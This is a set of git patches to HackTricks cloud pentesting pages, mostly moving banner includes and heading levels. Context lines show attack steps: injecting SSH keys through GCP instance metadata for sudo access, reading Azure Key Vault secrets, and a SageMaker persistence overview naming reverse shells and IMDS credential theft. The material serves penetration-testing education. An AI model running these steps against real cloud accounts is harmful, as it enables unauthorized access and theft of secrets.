b/src/pentesting-cloud/ibm-cloud-pentesting/README.md @@ -1,8 +1,10 @@ # IBM Cloud Pentesting +{{#include ../../banners/hacktricks-training.md}} + ## IBM Cloud Pentesting -{{#include ../../banners/hacktricks-training.md}} + ### What is IBM cloud? (By chatGPT) @@ -38,4 +40,3 @@ https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/ {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md b/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md index 28852b59f..e7f6435a2 100644 --- a/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md @@ -1,8 +1,10 @@ # Kubernetes Basics +{{#include ../../banners/hacktricks-training.md}} + ## Kubernetes Basics -{{#include ../../banners/hacktricks-training.md}} + **The original author of this page is** [**Jorge**](https://www.linkedin.com/in/jorge-belmonte-a924b616b/) **(read his original post** [**here**](https://sickrov.github.io)**)** @@ -569,4 +571,3 @@ https://www.youtube.com/watch?v=X48VuDVv0do {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md b/src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md index 7b8b8a438..9fdc0840f 100644 --- a/src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md @@ -1,5 +1,7 @@ # External Secret Operator +{{#include ../../banners/hacktricks-training.md}} + **The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/) This page gives some pointers onto how you can achieve to steal secrets from a misconfigured ESO or application which uses ESO to sync its secrets. @@ -119,3 +121,4 @@ https://github.com/external-secrets/external-secrets +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md index 500e10f43..75b5d5468 100644 --- a/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md @@ -1,5 +1,7 @@ # Kubernetes Kyverno +{{#include ../../../banners/hacktricks-training.md}} + **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196) ## Definition @@ -57,3 +59,4 @@ When a pod is created in the `default` namespace without the label `app: myapp`, +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md index fbc46f318..a53bb473a 100644 --- a/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md @@ -1,5 +1,7 @@ # Kubernetes Kyverno bypass +{{#include ../../../banners/hacktricks-training.md}} + **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196) @@ -64,3 +66,4 @@ Another way to bypass policies is to focus on the ValidatingWebhookConfiguration For more info check [https://madhuakula.com/kubernetes-goat/docs/scenarios/scenario-22/securing-kubernetes-clusters-using-kyverno-policy-engine/welcome/](https://madhuakula.com/kubernetes-goat/docs/scenarios/scenario-22/securing-kubernetes-clusters-using-kyverno-policy-engine/welcome/) +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md index 869a331c0..8b731f3ce 100644 --- a/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md @@ -1,5 +1,7 @@ # Kubernetes - OPA Gatekeeper +{{#include ../../../banners/hacktricks-training.md}} + **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196) ## Definition @@ -77,3 +79,4 @@ When Gatekeeper is deployed in the Kubernetes cluster, it will enforce this poli +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md index bd65c3f84..268e0d561 100644 --- a/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md @@ -1,5 +1,7 @@ # Kubernetes OPA Gatekeeper bypass +{{#include ../../../banners/hacktricks-training.md}} + **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196) ## Abusing misconfiguration @@ -64,3 +66,4 @@ Another way to bypass constraints is to focus on the ValidatingWebhookConfigurat +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md b/src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md index 00b49b2fa..70d3426d0 100644 --- a/src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md @@ -1,5 +1,7 @@ # Kubernetes ValidatingWebhookConfiguration +{{#include ../../banners/hacktricks-training.md}} + **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196) ## Definition @@ -103,3 +105,4 @@ abusing-roles-clusterroles-in-kubernetes/ +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/openshift-pentesting/README.md b/src/pentesting-cloud/openshift-pentesting/README.md index a49b1a3d6..3f05d0f56 100644 --- a/src/pentesting-cloud/openshift-pentesting/README.md +++ b/src/pentesting-cloud/openshift-pentesting/README.md @@ -1,5 +1,7 @@ # OpenShift Pentesting +{{#include ../../banners/hacktricks-training.md}} + ## Basic Information {{#ref}} @@ -20,3 +22,4 @@ openshift-privilege-escalation/ +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md b/src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md index e3e5a9550..d66bf9bc8 100644 --- a/src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md +++ b/src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md @@ -1,5 +1,7 @@ # OpenShift - Basic information +{{#include ../../banners/hacktricks-training.md}} + ## Kubernetes prior b**asic knowledge** Before working with OpenShift, ensure you are comfortable with the Kubernetes environment. The entire OpenShift chapter assumes you have prior knowledge of Kubernetes. @@ -41,3 +43,4 @@ https://docs.openshift.com/container-platform/3.11/architecture/additional_conce +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md index 306d8660a..f6e7b12da 100644 --- a/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md +++ b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md @@ -1,5 +1,7 @@ # OpenShift - Jenkins +{{#include ../../../banners/hacktricks-training.md}} + **The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/) This page gives some pointers onto how you can attack a Jenkins instance running in an Openshift (or Kubernetes) cluster @@ -40,3 +42,4 @@ openshift-jenkins-build-overrides.md +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md index d17a6c641..f4f5651f6 100644 --- a/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md +++ b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md @@ -1,5 +1,7 @@ # Jenkins in Openshift - build pod overrides +{{#include ../../../banners/hacktricks-training.md}} + **The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/) ## Kubernetes plugin for Jenkins @@ -275,3 +277,4 @@ pipeline { +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md index a5ab6e551..8044a06cb 100644 --- a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md +++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md @@ -1,5 +1,7 @@ # OpenShift - Privilege Escalation +{{#include ../../../banners/hacktricks-training.md}} + ## Missing Service Account {{#ref}} @@ -20,3 +22,4 @@ openshift-scc-bypass.md +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md index b6db84101..b04190f00 100644 --- a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md +++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md @@ -1,5 +1,7 @@ # OpenShift - Missing Service Account +{{#include ../../../banners/hacktricks-training.md}} + ## Missing Service Account It happens that cluster is deployed with preconfigured template automatically setting Roles, RoleBindings and even SCC to service account that is not yet created. This can lead to privilege escalation in the case where you can create them. In this case, you would be able to get the token of the SA newly created and the role or SCC associated. Same case happens when the missing SA is part of a missing project, in this case if you can create the project and then the SA you get the Roles and SCC associated. @@ -24,3 +26,4 @@ https://github.com/maxDcb/OpenShiftGrapher +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md index 7622ca20b..e8d2428d9 100644 --- a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md +++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md @@ -1,5 +1,7 @@ # Openshift - SCC bypass +{{#include ../../../banners/hacktricks-training.md}} + **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196) ## Privileged Namespaces @@ -139,3 +141,4 @@ To bypass GateKeeper's rules and set this label to execute a cluster takeover, * +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md index 6fb72c8e7..5b9a088c2 100644 --- a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md +++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md @@ -1,5 +1,7 @@ # OpenShift - Tekton +{{#include ../../../banners/hacktricks-training.md}} + **The original author of this page is** [**Haroun**](https://www.linkedin.com/in/haroun-al-mounayar-571830211) ### What is tekton @@ -76,3 +78,4 @@ spec: +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-scc.md b/src/pentesting-cloud/openshift-pentesting/openshift-scc.md index 3a935d8c7..9dbf812f2 100644 --- a/src/pentesting-cloud/openshift-pentesting/openshift-scc.md +++ b/src/pentesting-cloud/openshift-pentesting/openshift-scc.md @@ -1,5 +1,7 @@ # Openshift - SCC +{{#include ../../banners/hacktricks-training.md}} + **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196) ## Definition @@ -69,3 +71,4 @@ openshift-privilege-escalation/openshift-scc-bypass.md +{{#include ../../banners/hacktricks-training.md}} From 6f8738f34f2b33c57f4d4935ef02b4be45c16317 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Fri, 1 Aug 2025 11:47:18 +0200 Subject: [PATCH 04/16] Update aws-sagemaker-persistence.md --- .../aws-security/aws-persistence/aws-sagemaker-persistence.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md index 87121602e..5a50b5203 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.md @@ -2,8 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -# AWS - SageMaker Lifecycle Configuration Persistence - ## Overview of Persistence Techniques This section outlines methods for gaining persistence in SageMaker by abusing Lifecycle Configurations (LCCs), including reverse shells, cron jobs, credential theft via IMDS, and SSH backdoors. These scripts run with the instance’s IAM role and can persist across restarts. Most techniques require outbound network access, but usage of services on the AWS control plane can still allow success if the environment is in 'VPC-only" mode. From 0ba0d247a81a389648e799955cb0058b3dc88e00 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Fri, 1 Aug 2025 11:48:43 +0200 Subject: [PATCH 05/16] Update aws-inspector-enum.md --- .../aws-inspector-enum.md | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md index 99e043b2f..8922cbe88 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md @@ -2,11 +2,8 @@ {{#include ../../../../banners/hacktricks-training.md}} -## AWS - Inspector Enum - - -### Inspector +## Inspector Amazon Inspector is an advanced, automated vulnerability management service designed to enhance the security of your AWS environment. This service continuously scans Amazon EC2 instances, container images in Amazon ECR, Amazon ECS, and AWS Lambda functions for vulnerabilities and unintended network exposure. By leveraging a robust vulnerability intelligence database, Amazon Inspector provides detailed findings, including severity levels and remediation recommendations, helping organizations proactively identify and address security risks. This comprehensive approach ensures a fortified security posture across various AWS services, aiding in compliance and risk management. From 58c7ae8399ede396f4f5abe62b5655ce9232a474 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Fri, 1 Aug 2025 11:49:00 +0200 Subject: [PATCH 06/16] Update aws-trusted-advisor-enum.md --- .../aws-trusted-advisor-enum.md | 4 ---- 1 file changed, 4 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md index 4eb01865f..4fc3c0233 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md @@ -2,10 +2,6 @@ {{#include ../../../../banners/hacktricks-training.md}} -## AWS - Trusted Advisor Enum - - - ## AWS Trusted Advisor Overview Trusted Advisor is a service that **provides recommendations** to optimize your AWS account, aligning with **AWS best practices**. It's a service that operates across multiple regions. Trusted Advisor offers insights in four primary categories: From e1bc13c19c144ae6f6c020ecdc918be525125446 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Fri, 1 Aug 2025 11:49:21 +0200 Subject: [PATCH 07/16] Update aws-waf-enum.md --- .../aws-security-and-detection-services/aws-waf-enum.md | 4 ---- 1 file changed, 4 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md index b5fc9a57c..81ddcb096 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md @@ -2,10 +2,6 @@ {{#include ../../../../banners/hacktricks-training.md}} -## AWS - WAF Enum - - - ## AWS WAF AWS WAF is a **web application firewall** designed to **safeguard web applications or APIs** against various web exploits which may impact their availability, security, or resource consumption. It empowers users to control incoming traffic by setting up **security rules** that mitigate typical attack vectors like SQL injection or cross-site scripting and also by defining custom filtering rules. From 0a1f3dea22709a968f4e5ff8360b08fa5e166e41 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Fri, 1 Aug 2025 11:50:28 +0200 Subject: [PATCH 08/16] Update aws-ecr-enum.md --- .../aws-security/aws-services/aws-ecr-enum.md | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md index 043c1e63e..f928c389d 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md @@ -2,13 +2,9 @@ {{#include ../../../banners/hacktricks-training.md}} -## AWS - ECR Enum +## ECR - - -### ECR - -#### Basic Information +### Basic Information Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images. @@ -49,7 +45,7 @@ These are the **images** that in the **private registry** or to the **public** o
-#### Enumeration +### Enumeration ```bash # Get repos @@ -71,13 +67,13 @@ aws ecr get-registry-policy aws ecr get-repository-policy --repository-name ``` -#### Unauthenticated Enum +### Unauthenticated Enum {{#ref}} ../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md {{#endref}} -#### Privesc +### Privesc In the following page you can check how to **abuse ECR permissions to escalate privileges**: @@ -85,13 +81,13 @@ In the following page you can check how to **abuse ECR permissions to escalate p ../aws-privilege-escalation/aws-ecr-privesc.md {{#endref}} -#### Post Exploitation +### Post Exploitation {{#ref}} ../aws-post-exploitation/aws-ecr-post-exploitation.md {{#endref}} -#### Persistence +### Persistence {{#ref}} ../aws-persistence/aws-ecr-persistence.md From ccd50a451db260a6a94dd78f771dd0d003cac8d9 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Fri, 1 Aug 2025 11:50:45 +0200 Subject: [PATCH 09/16] Update eventbridgescheduler-enum.md --- .../aws-security/aws-services/eventbridgescheduler-enum.md | 4 ---- 1 file changed, 4 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md index 10a94bc14..c7246bd6f 100644 --- a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md @@ -2,10 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -## EventBridge Scheduler - - - ## EventBridge Scheduler **Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets. From 3157069bde0c04a2c9e2a65f1f164b55f846deb9 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Fri, 1 Aug 2025 11:51:49 +0200 Subject: [PATCH 10/16] Update az-static-web-apps.md --- .../azure-security/az-services/az-static-web-apps.md | 4 ---- 1 file changed, 4 deletions(-) diff --git a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md index 42f47a0b3..70d5a61f1 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md +++ b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md @@ -2,10 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -# Az - Static Web Apps - - - ## Static Web Apps Basic Information Azure Static Web Apps is a cloud service for hosting **static web apps with automatic CI/CD from repositories like GitHub**. It offers global content delivery, serverless backends, and built-in HTTPS, making it secure and scalable. However, even if the service is called "static", it doesn't mean it's completely safe. Risks include misconfigured CORS, insufficient authentication, and content tampering, which can expose apps to attacks like XSS and data leakage if not properly managed. From 5fd9ed5048b9bce45a62a4dd57ff232deb4e6ed2 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Fri, 1 Aug 2025 11:52:52 +0200 Subject: [PATCH 11/16] Update gcp-add-custom-ssh-metadata.md --- .../gcp-add-custom-ssh-metadata.md | 14 +++++--------- 1 file changed, 5 insertions(+), 9 deletions(-) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md index 88d015455..a68e756b5 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md @@ -2,21 +2,17 @@ {{#include ../../../../banners/hacktricks-training.md}} -## GCP - Add Custom SSH Metadata - - - -### Modifying the metadata +## Modifying the metadata Metadata modification on an instance could lead to **significant security risks if an attacker gains the necessary permissions**. -#### **Incorporation of SSH Keys into Custom Metadata** +### **Incorporation of SSH Keys into Custom Metadata** On GCP, **Linux systems** often execute scripts from the [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts). A critical component of this is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which is designed to **regularly check** the instance metadata endpoint for **updates to the authorized SSH public keys**. Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and **integrated into the local system**. The key will be added into `~/.ssh/authorized_keys` file of an **existing user or potentially creating a new user with `sudo` privileges**, depending on the key's format. And the attacker will be able to compromise the host. -#### **Add SSH key to existing privileged user** +### **Add SSH key to existing privileged user** 1. **Examine Existing SSH Keys on the Instance:** @@ -57,7 +53,7 @@ Therefore, if an attacker can modify custom metadata, he could make the the daem sudo id ``` -#### **Create a new privileged user and add a SSH key** +### **Create a new privileged user and add a SSH key** If no interesting user is found, it's possible to create a new one which will be given `sudo` privileges: @@ -79,7 +75,7 @@ gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-k ssh -i ./key "$NEWUSER"@localhost ``` -#### SSH keys at project level +### SSH keys at project level It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by **applying SSH keys at the project level**. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide: From 6b96bae3485d78ab8a1c847b5e2c438cb775875f Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Fri, 1 Aug 2025 11:53:20 +0200 Subject: [PATCH 12/16] Update README.md --- src/pentesting-cloud/ibm-cloud-pentesting/README.md | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/src/pentesting-cloud/ibm-cloud-pentesting/README.md b/src/pentesting-cloud/ibm-cloud-pentesting/README.md index 7f62ffb66..eae85da46 100644 --- a/src/pentesting-cloud/ibm-cloud-pentesting/README.md +++ b/src/pentesting-cloud/ibm-cloud-pentesting/README.md @@ -2,11 +2,7 @@ {{#include ../../banners/hacktricks-training.md}} -## IBM Cloud Pentesting - - - -### What is IBM cloud? (By chatGPT) +## What is IBM cloud? (By chatGPT) IBM Cloud, a cloud computing platform by IBM, offers a variety of cloud services such as infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS). It enables clients to deploy and manage applications, handle data storage and analysis, and operate virtual machines in the cloud. @@ -17,7 +13,7 @@ When compared with Amazon Web Services (AWS), IBM Cloud showcases certain distin 3. **Artificial Intelligence and Machine Learning (AI & ML)**: IBM Cloud is particularly noted for its extensive and integrated services in AI and ML. AWS also offers AI and ML services, but IBM's solutions are considered more comprehensive and deeply embedded within its cloud platform. 4. **Industry-Specific Solutions**: IBM Cloud is recognized for its focus on particular industries like financial services, healthcare, and government, offering bespoke solutions. AWS caters to a wide array of industries but might not have the same depth in industry-specific solutions as IBM Cloud. -#### Basic Information +### Basic Information For some basic information about IAM and hierarchi check: @@ -25,7 +21,7 @@ For some basic information about IAM and hierarchi check: ibm-basic-information.md {{#endref}} -### SSRF +## SSRF Learn how you can access the medata endpoint of IBM in the following page: From 96b0de9ec94ad0248a307bd40d7b261a73bf00a4 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Fri, 1 Aug 2025 11:53:55 +0200 Subject: [PATCH 13/16] Update kubernetes-basics.md --- src/pentesting-cloud/kubernetes-security/kubernetes-basics.md | 4 ---- 1 file changed, 4 deletions(-) diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md b/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md index e7f6435a2..ee6ec55bb 100644 --- a/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-basics.md @@ -2,10 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -## Kubernetes Basics - - - **The original author of this page is** [**Jorge**](https://www.linkedin.com/in/jorge-belmonte-a924b616b/) **(read his original post** [**here**](https://sickrov.github.io)**)** ## Architecture & Basics From e0b92e3b7adaba9e86f6f6beae7cff38ffbe757c Mon Sep 17 00:00:00 2001 From: carlospolop Date: Fri, 1 Aug 2025 12:04:42 +0200 Subject: [PATCH 14/16] f --- .../az-lateral-movement-cloud-on-prem/az-seamless-sso.md | 1 - 1 file changed, 1 deletion(-) diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md index d5763654b..0c58d0c89 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md @@ -206,4 +206,3 @@ If the Active Directory administrators have access to Azure AD Connect, they can {{#include ../../../banners/hacktricks-training.md}} - From c3cfb95b875022513b81b9c24794c891b9600799 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Mon, 4 Aug 2025 11:29:20 +0200 Subject: [PATCH 15/16] f --- src/pentesting-cloud/azure-security/az-services/az-keyvault.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/src/pentesting-cloud/azure-security/az-services/az-keyvault.md b/src/pentesting-cloud/azure-security/az-services/az-keyvault.md index 7c2efb08c..205a69220 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-keyvault.md +++ b/src/pentesting-cloud/azure-security/az-services/az-keyvault.md @@ -92,6 +92,9 @@ az role assignment list --include-inherited --scope "/subscriptions/ --name # Get old versions secret value az keyvault secret show --id https://.vault.azure.net/secrets// + +# List deleted key vaults +az keyvault secret list-deleted --vault-name ``` {{#endtab }} From b82a88252caf3d4690944143f8b10a6934ee1e46 Mon Sep 17 00:00:00 2001 From: carlospolop Date: Mon, 4 Aug 2025 11:37:34 +0200 Subject: [PATCH 16/16] f --- .../azure-security/az-lateral-movement-cloud-on-prem/README.md | 1 - .../az-arc-vulnerable-gpo-deploy-script.md | 1 - .../az-cloud-kerberos-trust.md | 1 - .../az-lateral-movement-cloud-on-prem/az-cloud-sync.md | 2 +- .../az-lateral-movement-cloud-on-prem/az-connect-sync.md | 1 - .../az-lateral-movement-cloud-on-prem/az-domain-services.md | 2 +- .../az-lateral-movement-cloud-on-prem/az-federation.md | 1 - .../az-hybrid-identity-misc-attacks.md | 1 - .../az-local-cloud-credentials.md | 1 - .../az-pass-the-certificate.md | 1 - .../az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md | 1 - .../az-primary-refresh-token-prt.md | 1 - .../az-pta-pass-through-authentication.md | 1 - .../az-lateral-movement-cloud-on-prem/az-seamless-sso.md | 1 - 14 files changed, 2 insertions(+), 14 deletions(-) diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md index 5535eb0f2..de0aab9ab 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md @@ -39,4 +39,3 @@ This section covers the pivoting techniques to move from a compromised Entra ID {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md index e1a95372b..53286d0cb 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md @@ 